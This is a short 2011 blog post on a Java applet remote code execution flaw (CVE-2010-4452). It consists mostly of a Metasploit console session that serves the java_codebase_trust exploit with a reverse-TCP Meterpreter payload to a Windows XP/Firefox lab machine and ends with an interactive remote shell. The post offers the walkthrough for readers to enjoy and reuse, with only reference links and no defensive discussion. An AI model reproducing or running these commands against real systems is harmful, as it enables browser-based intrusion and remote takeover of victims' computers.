Another Java exploit


Info:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4452
http://www.osvdb.org/71193
http://www.zerodayinitiative.com/advisories/ZDI-11-084/
http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/
http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html

The exploit works against Windows XP SP3 and Firefox 3.6.12 with JRE 1.6.0_23, but fails on Windows 7 SP1 with the same configuration.
Hope you enjoy.

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 658 exploits - 343 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12021 updated today (2011.03.18)

msf > use exploit/windows/browser/java_codebase_trust
msf exploit(java_codebase_trust) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_codebase_trust) > set LHOST 172.16.16.2
LHOST => 172.16.16.2
msf exploit(java_codebase_trust) > set SRVHOST 172.16.16.2
SRVHOST => 172.16.16.2
msf exploit(java_codebase_trust) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_codebase_trust) > set URIPATH /
URIPATH => /
msf exploit(java_codebase_trust) > exploit -k
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.16.2:4444
[*] Using URL: http://172.16.16.2:80/
[*] Server started.
msf exploit(java_codebase_trust) > [*] Sending HTML file to 172.16.16.10:1063...
[*] Sending HTML file to 172.16.16.10:1063...
[*] Sending class file to 172.16.16.10:1064...
[*] Sending class file to 172.16.16.10:1064...
[*] Sending stage (27642 bytes) to 172.16.16.10
[*] Meterpreter session 1 opened (172.16.16.2:4444 -> 172.16.16.10:1065) at 2011-03-19 09:36:12 +0700
[*] Sending HTML file to 172.16.16.10:1063...

msf exploit(java_codebase_trust) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : yan-5fe04791245
OS : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>

Posted on March 19, 2011, in Hacking & security.